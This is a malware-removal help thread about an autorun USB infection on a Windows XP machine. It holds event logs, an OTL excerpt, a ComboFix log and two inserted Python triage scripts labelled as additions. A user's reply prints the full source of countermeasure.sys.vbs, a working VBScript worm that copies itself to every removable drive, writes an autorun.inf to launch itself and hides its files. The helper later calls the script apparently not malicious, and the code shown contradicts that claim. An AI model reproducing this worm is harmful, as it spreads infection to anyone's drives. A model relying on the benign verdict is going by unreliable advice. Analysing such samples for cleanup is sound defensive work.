Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 3:34:42 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 15 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.

Error - 8/2/2010 4:03:41 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Service Control Manager | ID = 7000
Description = Δεν ήταν δυνατή η εκκίνηση της υπηρεσίας General Purpose USB Driver
(e4ldr.sys) εξαιτίας του ακόλουθου σφάλματος: %%2

Error - 8/2/2010 4:11:51 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Service Control Manager | ID = 7000
Description = Δεν ήταν δυνατή η εκκίνηση της υπηρεσίας General Purpose USB Driver
(e4ldr.sys) εξαιτίας του ακόλουθου σφάλματος: %%2

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 14 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 15 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.

Error - 8/2/2010 4:13:05 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 4:13:05 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 15 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.


< End of report >

I hope this'll help...

Edited by couber, 08 February 2010 - 02:24 PM.


#4
RKinner (Malware Expert; Expert, 23,181 posts, MVP)
OTL says you have autorun.inf files even if you can't see them.

O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - C:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - D:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:38 | 000,000,118 | RHS- | M] () - I:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/07 18:22:28 | 000,000,000 | ---D | M] - I:\autorun -- [ FAT32 ]

and

[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\WINDOWS\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () -- C:\autorun.inf

Since the two vbs files were installed at the same time they are probably being called by the autorun. It would be interesting to see what they do:


Copy the text between the lines of stars by highlighting and Ctrl + c.

******************************************************************
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f

**********************************************************************

Start, Run, cmd, OK to bring up a new Command Prompt window. Right-click and select Paste and the above text should appear. Make sure you got it all and then hit Enter.

(Now let's see what the files are up to: )

cd \

(CD SPACE \ )

attrib -r -h -s autorun.inf

(attrib SPACE -r SPACE -h SPACE -s SPACE autorun.inf )

notepad autorun.inf

(notepad SPACE autorun.inf)

(Once you copy the text to a reply you can close notepad and then go back to the command window)

del autorun.inf

(del SPACE autorun.inf)

mkdir autorun.inf

(mkdir SPACE autorun.inf)

attrib -r -h -s countermeasure.sys.vbs

(attrib SPACE -r SPACE -h SPACE -s SPACE countermeasure.sys.vbs )

notepad countermeasure.sys.vbs

(notepad SPACE countermeasure.sys.vbs)

(Once you copy the text to a reply you can close notepad and then go back to the command window)

exit

Download Flash_Disinfector.exe by sUBs
http://download.blee...Disinfector.exe
and save it to your desktop.

* Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
* The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
* Wait until it has finished scanning and then exit the program.
* Reboot your computer when done.


Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Download but do not yet run ComboFix
If you have a previous version of Combofix.exe, delete it and download a fresh copy.

It must be saved to your desktop, do not run it.

Disable your Antivirus software when downloading or running Combofix. If it has Script Blocking features, please disable these as well. See: http://www.bleepingc...opic114351.html


Download and rename this file (call it george.exe) to your Desktop from either of these two sources:
http://download.blee...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Double-click on george to start the program.



* Important: Have no other programs running. Your Task Bar should be clear of any program entries including your Browser.


* A window may open with a series of Disclaimers. Accept the Disclaimers to start the fix. Allow it to install the Recovery Console then Continue. When the scan completes Notepad will open with your results log open. Do a File, Exit and answer 'Yes' to save changes.


A caution - Do not run Combofix more than once. Do not touch your mouse/keyboard until the scan has completed, as this may cause the process to stall or your computer to lock. The scan will temporarily disable your desktop, and if interrupted may leave your desktop disabled. If this occurs, please reboot to restore the desktop. Even when ComboFix appears to be doing nothing, look at your Drive light. If it is flashing, Combofix is still at work.

A file will be created at => C:\Combofix.txt. I'll need to see that in your reply.

Re-activate your protection programs at this time.

Ron
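The two checks Ron does by hand in the reply above (pick the hidden autorun.inf files out of the OTL O32 lines, then open the file to see what it launches), written up as an added Python triage script that is not part of the thread, of OTL or of Flash_Disinfector. The sample O32 lines and the sample autorun.inf are constructed from this thread's text, and the verdict names are my own.

```python
"""Triage helper for the OTL 'O32 - AutoRun File' lines quoted above.
Added example, not code from the thread, OTL or Flash_Disinfector. It
separates a hidden/system autorun.inf FILE (infection marker) from a FOLDER
named autorun.inf (the immunisation), and reads an autorun.inf to see what it
would launch. Sample lines are constructed from this thread's text."""
import re
from dataclasses import dataclass

# attr field of an O32 line: R=read-only, H=hidden, S=system, D=directory.
O32_RE = re.compile(
    r"O32 - AutoRun File - \[(?P<ts>[^|]+?) \| (?P<size>[\d,]+) \| "
    r"(?P<attr>[^|\]]+?) \| M\] (?:\(\) )?- (?P<path>[A-Za-z]:\\\S*)"
)
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "cmd", "rundll32"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")


@dataclass
class AutoRunEntry:
    path: str
    size: int
    attrs: str  # e.g. "RHS-" or "---D"


def parse_o32_line(line):
    """AutoRunEntry for an O32 line, None for any other line."""
    m = O32_RE.search(line)
    if not m:
        return None
    return AutoRunEntry(m.group("path"),
                        int(m.group("size").replace(",", "")),
                        m.group("attr").strip())


def classify(entry):
    """Verdict for one entry, using only its name and attribute bits."""
    name = entry.path.rsplit("\\", 1)[-1].lower()
    if "D" in entry.attrs:
        # A folder named exactly autorun.inf stops a file of that name being
        # created beside it; any other folder name (I:\autorun) protects nothing.
        return "immunised" if name == "autorun.inf" else "folder-not-protective"
    if "H" in entry.attrs and "S" in entry.attrs:
        # read-only+hidden+system is how the dropper hides the file; the
        # 'attrib -r -h -s autorun.inf' step in the reply undoes exactly that.
        return "suspicious"
    return "review"


def triage_o32(lines):
    """Map every O32 line to (path, verdict); other lines are skipped."""
    entries = (parse_o32_line(line) for line in lines)
    return [(e.path, classify(e)) for e in entries if e is not None]


def autorun_targets(inf_text):
    """Commands an autorun.inf would run: the open, shellexecute and
    shell\\<verb>\\command keys inside its [autorun] section."""
    targets, in_autorun = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line.lower() == "[autorun]"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            key = key.strip().lower()
            if key in ("open", "shellexecute") or (
                    key.startswith("shell\\") and key.endswith("\\command")):
                targets[key] = value.strip()
    return targets


def is_script_launch(command):
    """True when the command runs a script host or names a script file."""
    tokens = command.lower().replace('"', "").split()
    if not tokens:
        return False
    exe = tokens[0].rsplit("\\", 1)[-1].split(".")[0]
    return exe in SCRIPT_HOSTS or any(t.endswith(SCRIPT_EXTS) for t in tokens)


# Constructed samples, copied from the lines quoted in this thread.
SAMPLE_O32 = [
    r"O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - C:\autorun.inf -- [ FAT32 ]",
    r"O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - D:\autorun.inf -- [ FAT32 ]",
    r"O32 - AutoRun File - [2010/02/07 18:22:28 | 000,000,000 | ---D | M] - I:\autorun -- [ FAT32 ]",
]
SAMPLE_INF = "[autorun]\r\nshellexecute=wscript.exe countermeasure.sys.vbs\r\n"

if __name__ == "__main__":
    for path, verdict in triage_o32(SAMPLE_O32):
        print(f"{verdict:22} {path}")
    for key, cmd in autorun_targets(SAMPLE_INF).items():
        print(f"{key}={cmd}  [{'SCRIPT' if is_script_launch(cmd) else 'ok'}]")
```

Note that the folder OTL reported on I: is named autorun, not autorun.inf, which is why the script does not count it as an immunisation and why I:\autorun.inf could still be written next to it.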

#5
couber (Topic Starter; Member, 29 posts)
Hello and thanks for your time!!!

Here are the reports

Autorun.inf report:

[autorun]
shellexecute=wscript.exe countermeasure.sys.vbs

countermeasure.sys report


'-------------------------------------------------------------------------------------
'This is our countermeasure to the SolowD Worm-type virus.
'Created by ThinkDeep group to save TEI from this virus
'-------------------------------------------------------------------------------------

on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado

katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe countermeasure.sys.vbs"

set kfs = createobject("Scripting.FileSystemObject")
set kmf = kfs.getfile(Wscript.ScriptFullname)

dim text,size
size = kmf.size
check = kmf.drive.drivetype
set text = kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf

loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\countermeasure.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\countermeasure.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\countermeasure.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\countermeasure.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\countermeasure.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\countermeasure.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next

'--------------------------------------
'----------MUST BE DELETED-------------
set rgpath=createobject("WScript.Shell")
rgpath.DeleteKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.DeleteKey "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
'--------------------------------------
'--------------------------------------

if check <> 1 then
Wscript.sleep 200000
end if

loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

And finally combofix.txt

ComboFix 10-02-08.09 - Bougioukli Sofia 09/02/2010 19:04:09.1.2 - FAT32x86
Microsoft Windows XP Professional 5.1.2600.3.1253.30.1032.18.511.283 [GMT 2:00]
Running from: c:\documents and settings\Bougioukli Sofia\Επιφάνεια εργασίας\george.exe
AV: ESET Smart Security 3.0 *On-access scanning disabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
FW: ESET Personal firewall *enabled* {E5E70D32-0101-4340-86A3-A7B0F1C8FFE0}
* Resident AV is active

.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\Ινδιάνος .bmp
c:\windows\system32\winlogon.bak
D:\Autorun.inf
I:\Autorun.inf

.
((((((((((((((((((((((((( Files Created from 2010-01-09 to 2010-02-09 )))))))))))))))))))))))))))))))
.

2010-02-07 16:17 . 2006-07-22 21:49 5376 ------w- c:\windows\system32\antiwpa.dll
2010-02-07 16:14 . 2010-02-07 16:14 -------- d-sh--w- c:\documents and settings\Administrator\IETldCache
2010-02-07 14:12 . 2010-01-07 14:07 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2010-02-07 14:12 . 2010-02-07 14:12 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes
2010-02-07 14:12 . 2010-01-07 14:07 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2010-02-07 14:12 . 2010-02-07 14:12 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2010-02-07 11:37 . 2010-02-07 11:37 -------- d-----w- c:\windows\system32\wbem\Repository
2010-01-26 17:29 . 2010-02-09 13:19 4944 --sha-r- c:\windows\countermeasure.sys.vbs
2010-01-26 17:29 . 2010-02-09 13:19 4944 ----a-w- C:\countermeasure.sys.vbs
2010-01-16 18:10 . 2010-01-16 18:10 -------- d-----w- c:\documents and settings\All Users\Application Data\Yahoo! Companion
2010-01-16 18:09 . 2010-01-16 18:09 -------- d-----w- c:\windows\SxsCaPendDel
2010-01-13 17:10 . 2010-01-13 17:10 -------- d-----w- c:\program files\Yahoo! Games
2010-01-10 19:51 . 2010-01-10 19:51 -------- d-----w- C:\FOUND.009

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-01-08 16:44 . 2010-01-08 16:44 -------- d-----w- c:\program files\CDisplay
2010-01-08 16:28 . 2010-01-08 16:28 -------- d-----w- c:\documents and settings\Bougioukli Sofia\Application Data\BSplayer
2010-01-08 14:23 . 2005-03-28 14:10 28232 ----a-w- c:\documents and settings\Bougioukli Sofia\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-12-21 19:06 . 2006-06-23 11:28 916480 ----a-w- c:\windows\system32\wininet.dll
2009-12-10 12:07 . 2002-09-30 10:00 94960 ----a-w- c:\windows\system32\perfc008.dat
2009-12-10 12:07 . 2002-09-30 10:00 550762 ----a-w- c:\windows\system32\perfh008.dat
2009-12-07 20:57 . 2009-12-07 20:57 1417353 ----a-w- c:\documents and settings\All Users\Application Data\NeoEdge Networks\Yahoo_NannyMania\IAF.dll
2009-11-21 15:54 . 2002-09-30 10:00 471552 ----a-w- c:\windows\AppPatch\AcLayers.dll
2009-11-21 14:38 . 2009-11-21 14:38 152576 ----a-w- c:\documents and settings\Bougioukli Sofia\Application Data\Sun\Java\jre1.6.0_17\lzma.dll
2009-11-21 14:38 . 2009-11-21 14:38 79488 ----a-w- c:\documents and settings\Bougioukli Sofia\Application Data\Sun\Java\jre1.6.0_17\gtapi.dll
2001-05-24 10:59 . 2008-11-23 10:49 162304 ----a-w- c:\program files\UNWISE.EXE
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Messenger (Yahoo!)"="c:\progra~1\Yahoo!\MESSEN~1\YahooMessenger.exe" [2009-11-10 5244216]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE" [2003-10-08 57344]
"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"Easy-PrintToolBox"="c:\program files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE" [2004-01-14 409600]
"DAEMON Tools"="c:\program files\DAEMON Tools\daemon.exe" [2005-12-10 133016]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2007-10-19 286720]
"CARPService"="carpserv.exe" [2001-12-22 4608]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2007-12-21 1443072]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2009-03-27 13684736]
"nwiz"="nwiz.exe" [2009-03-27 1657376]
"ISUSPM"="c:\program files\Common Files\InstallShield\UpdateService\isuspm.exe" [2006-05-16 213936]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2009-03-27 86016]
"MP10_EnsureFileVer"="c:\windows\inf\unregmp2.exe" [2008-04-14 212992]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-10-11 149280]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-12-21 35760]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2009-12-11 948672]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\System32\CTFMON.EXE" [2008-04-14 15360]

c:\documents and settings\Bougioukli Sofia\Start Menu\Προγράμματα\Εκκίνηση\
Webshots.lnk - c:\program files\Webshots\Launcher.exe [2006-2-13 45056]

c:\documents and settings\All Users\Start Menu\Προγράμματα\Εκκίνηση\
Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588]

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\Sony Ericsson\\Sony Ericsson Media Manager\\MediaManager.exe"=

R2 ekrn;Eset Service;c:\program files\ESET\ESET Smart Security\ekrn.exe [21/12/2007 8:21 πμ 468224]
S0 sptd;sptd;c:\windows\system32\drivers\sptd.sys [9/10/2006 2:34 μμ 642560]
S2 IKANLOADER2;General Purpose USB Driver (e4ldr.sys);c:\windows\system32\Drivers\e4ldr.sys --> c:\windows\system32\Drivers\e4ldr.sys [?]
S3 e4usbaw;USB ADSL2 WAN Adapter;c:\windows\system32\DRIVERS\e4usbaw.sys --> c:\windows\system32\DRIVERS\e4usbaw.sys [?]
S3 KTalk;KTalk;\??\c:\docume~1\BOUGIO~1\LOCALS~1\Temp\ktalk.sys --> c:\docume~1\BOUGIO~1\LOCALS~1\Temp\ktalk.sys [?]
.
Contents of the 'Scheduled Tasks' folder

2010-02-09 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2007-08-29 12:57]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.yahoo.com/
IE: Easy-WebPrint Add To Print List - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_AddToList.html
IE: Easy-WebPrint High Speed Print - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_HSPrint.html
IE: Easy-WebPrint Preview - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_Preview.html
IE: Easy-WebPrint Print - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_Print.html
IE: Ε&ξαγωγή στο Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
DPF: DirectAnimation Java Classes - file://c:\windows\Java\classes\dajava.cab
DPF: Microsoft XML Parser for Java - file://c:\windows\Java\classes\xmldso.cab
FF - ProfilePath - c:\documents and settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.yahoo.com
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

---- FIREFOX POLICIES ----
FF - user.js: yahoo.ytff.general.dontshowhpoffer - true.
- - - - ORPHANS REMOVED - - - -

HKLM-Run-NWEReboot - (no file)
AddRemove-{AC64B069-151A-4E5B-9274-DF7ABD779578} - H:\Uninstall.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-02-09 19:08
Windows 5.1.2600 Service Pack 3 FAT NTAPI

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\WPAEvents]
@Denied: (Full) (LocalSystem)
"OOBETimer"=hex:7f,63,3e,be,ec,25,8e,19,be,a7,92,c6
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(892)
c:\windows\system32\antiwpa.dll
.
Completion time: 2010-02-09 19:09:54
ComboFix-quarantined-files.txt 2010-02-09 17:09

Pre-Run: 3.381.379.072 διαθέσιμα byte
Post-Run: 3.349.135.360 διαθέσιμα byte

WindowsXP-KB310994-SP2-Pro-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

Current=1 Default=1 Failed=0 LastKnownGood=4 Sets=1,2,3,4
- - End Of File - - 87B4AA33BD05DB0E097DE09AEEB10670

Well, everything seems to be working right now. I hope this is over...

PS: I noticed that some new files were created on my C: drive (FOUND.001 etc.). What are these???
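
Entries like the S3 KTalk driver in the log above (an image path under a Temp folder, and a [?] where ComboFix could not read the file's date and size) are the first things a helper looks for in a services list. The following Python script is an added example, not part of this thread and not ComboFix's own code: it parses lines in ComboFix's services layout (state letter, start type, name;display;path, optional "--> resolved path", bracketed details) and flags those two conditions. The sample lines are constructed to mirror the log above, and the reading of [?] as "file not found at scan time" is an assumption stated in the code.

```python
import re

# Constructed sample in the layout of ComboFix's services section.  The
# entries mirror the ones in the log above; they are not from a live system.
SAMPLE_LOG = r"""
R2 ekrn;Eset Service;c:\program files\ESET\ESET Smart Security\ekrn.exe [21/12/2007 8:21 πμ 468224]
S0 sptd;sptd;c:\windows\system32\drivers\sptd.sys [9/10/2006 2:34 μμ 642560]
S2 IKANLOADER2;General Purpose USB Driver (e4ldr.sys);c:\windows\system32\Drivers\e4ldr.sys --> c:\windows\system32\Drivers\e4ldr.sys [?]
S3 KTalk;KTalk;\??\c:\docume~1\BOUGIO~1\LOCALS~1\Temp\ktalk.sys --> c:\docume~1\BOUGIO~1\LOCALS~1\Temp\ktalk.sys [?]
"""

# One service/driver line: state (R = running, S = stopped), start type digit,
# service name, display name, image path, an optional "--> resolved path",
# and finally "[date time size]" or "[?]".
_LINE = re.compile(
    r"^(?P<state>[RS])(?P<start>\d)\s+"
    r"(?P<name>[^;]+);(?P<display>[^;]*);"
    r"(?P<path>.+?)"
    r"(?:\s+-->\s+(?P<resolved>.+?))?"
    r"\s+\[(?P<info>[^\]]*)\]\s*$"
)

# A "\Temp\" path component anywhere in the image path (short 8.3 names included).
_TEMP_DIR = re.compile(r"\\temp\\", re.IGNORECASE)


def parse_service_line(line):
    """Return a dict of fields for one ComboFix service line, or None if it is not one."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["start"] = int(entry["start"])
    # Assumption: "[?]" means ComboFix could not read the file's date/size,
    # i.e. the file was not present at that path while the scan ran.
    entry["file_missing"] = entry["info"].strip() == "?"
    return entry


def triage(log_text):
    """Return [(service_name, [reasons])] for the entries worth a second look."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_service_line(line)
        if entry is None:
            continue
        reasons = []
        # Prefer the resolved path: it is the location ComboFix actually checked.
        path = entry["resolved"] or entry["path"]
        if _TEMP_DIR.search(path):
            reasons.append("image path is under a Temp directory")
        if entry["file_missing"]:
            reasons.append("file details unavailable ([?]): image not found at scan time")
        if reasons:
            findings.append((entry["name"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_LOG):
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On the constructed sample the script reports IKANLOADER2 once (orphaned entry, file not found) and KTalk twice (Temp directory and file not found); ekrn and sptd are not reported. An orphaned entry is not by itself malicious, but a kernel driver registered from a user's Temp folder is exactly the kind of line a helper asks about.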

#6
RKinner

    Malware Expert

  • Expert
  • 23,181 posts
  • MVP
The files you are seeing are created when you (or Windows) do a disk check. They are recovered fragments of damaged or lost files. Not really a good sign, since it may indicate your hard drive is getting tired and may fail in the near future. Good time to back up any important data you may have stored on it.

The vbs file did not appear to be malicious, but I'm not an expert on vbs so I can't be sure. You can try gmer again and see if it runs now. (Sometimes it helps if you turn off your antivirus before downloading and running it. Also try renaming it to gmr.exe.) If it still won't run, get RootRepeal from
http://rootrepeal.googlepages.com/ , save it to your desktop and run it. Press the Scan button.
I think it creates a log; if so, I'd like to see it.

We need to clean up System Restore. Follow Jim's procedure here:
http://forum.aumha.o...581099691bf108f


I usually recommend a free BitDefender online scan as a final check to see if we missed anything: http://www.bitdefend...nline/free.html
It takes a while (hours) and you have to turn off your antivirus while you are running it, but it is pretty thorough. It doesn't fix anything, so if it finds something (that is not in Qoobox or your antivirus's subfolders) you should save the log and post it in a reply.
If Windows blocks the ActiveX, then try putting BitDefender in your trusted sites: In IE, Tools, Internet Options, Security, Trusted Sites, Sites. Then uncheck the HTTPS box, put in *.bitdefender.com, then Add, OK.

If BitDefender comes back clean then you can uninstall or delete any tools we had you download and their logs. You can manually remove C:\george and C:\qoobox, then put your system back the way it was (though I would leave the hide extensions option unchecked).


You do not have the latest Java. Get the latest (6.18, I think) at:

http://www.java.com/...nload/index.jsp


Once you install it, go into Control Panel, Add/Remove Software and remove any old versions (which may call themselves Java Runtime, Runtime Environment, Runtime, JRE, Java Virtual Machine, Virtual Machine, Java VM, JVM, VM, J2RE, J2SE).
I see:
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}" = Java™ 6 Update 17
"{3248F0A8-6813-11D6-A77B-00B0D0160070}" = Java™ 6 Update 7

Also make sure you have the latest versions of any adobe.com products you use, like Shockwave, Flash or Acrobat. Adobe is fond of foisting GetPlus on you. You can let them install it and then, afterwards, go into Control Panel, Add/Remove Software and remove it. It probably doesn't hurt to leave it, but I don't see the need for it and it has caused problems in the past.

